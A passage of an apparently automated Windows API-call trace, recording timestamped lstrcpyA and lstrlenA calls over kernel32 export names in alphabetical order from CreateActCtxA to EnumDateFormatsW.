lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.825] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.825] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.825] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.825] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.825] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.825] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.826] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.826] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.826] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.826] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.826] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.826] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.826] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.826] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.826] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.826] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.826] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.826] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.826] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.826] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.826] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.826] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.826] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.826] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.826] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.827] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.827] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.827] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.827] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.827] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.827] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.827] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.827] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.827] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.827] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.827] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.827] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.827] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.827] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.827] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.827] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.827] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.827] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.828] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.828] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.828] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.828] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.828] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.828] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.828] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.828] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.828] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.828] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.828] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.828] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.828] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.828] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.828] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.828] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.828] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.828] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.829] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.829] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.829] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.829] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.829] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.829] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.829] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.829] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.829] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.829] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.829] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.829] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.829] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.829] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.829] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.829] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.829] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.829] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.830] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.830] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.830] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.830] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.830] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.830] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.830] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.830] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.830] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.830] lstrlenA (lpString="DELETEATOM") returned 10 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.830] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.830] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.830] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.830] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.830] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.830] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.830] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.830] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.831] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.831] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.831] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.831] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.831] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.831] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.831] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.831] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.831] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.831] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.831] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.831] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.831] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.831] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.831] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.831] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.831] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.831] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.831] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.832] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.832] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.832] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.832] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.832] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.832] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.832] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.832] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.832] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.832] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.832] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.832] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.832] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.832] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.832] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.832] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.832] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.832] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.832] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.832] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.832] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.832] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.832] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.832] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.832] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.833] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.833] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.833] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") 